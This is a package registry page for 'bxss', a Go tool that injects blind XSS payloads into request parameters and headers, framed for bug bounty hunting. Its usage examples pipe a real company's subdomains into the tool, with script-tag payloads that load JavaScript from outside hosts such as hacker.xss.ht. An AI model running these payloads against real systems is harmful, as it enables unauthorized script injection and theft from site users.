github.com/ethicalhackingplayground/bxss

v0.0.0-20200810001345-7d2e5e8a7551
Source
Go

Version published: 4 years ago

Created: 4 years ago

Source

alt text

Version 1.0

😎 Bxss 😎

A Blind XSS Injector tool

Features

Inject Blind XSS payloads into custom headers
Inject Blind XSS payloads into parameters
Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
Tool Chaining
Really fast
Easy to setup

Install

$ go get -u github.com/ethicalhackingplayground/bxss

Arguments



          ____
         |  _ \
         | |_) |_  _____ ___
         |  _ <\ \/ / __/ __|
         | |_) |>  <\__ \__ \
         |____//_/\_\___/___/


        -- Coded by @z0idsec --
  -appendMode
        Append the payload to the parameter
  -concurrency int
        Set the concurrency (default 30)
  -header string
        Set the custom header (default "User-Agent")
  -parameters
        Test the parameters for blind xss
  -payload string
        the blind XSS payload

Blind XSS In Parameters

$ subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters

Blind XSS In X-Forwarded-For Header

$ subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"

If you get a bounty please support by buying me a coffee

FAQs

What is github.com/ethicalhackingplayground/bxss?

Package last updated on 10 Aug 2020

Did you know?

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install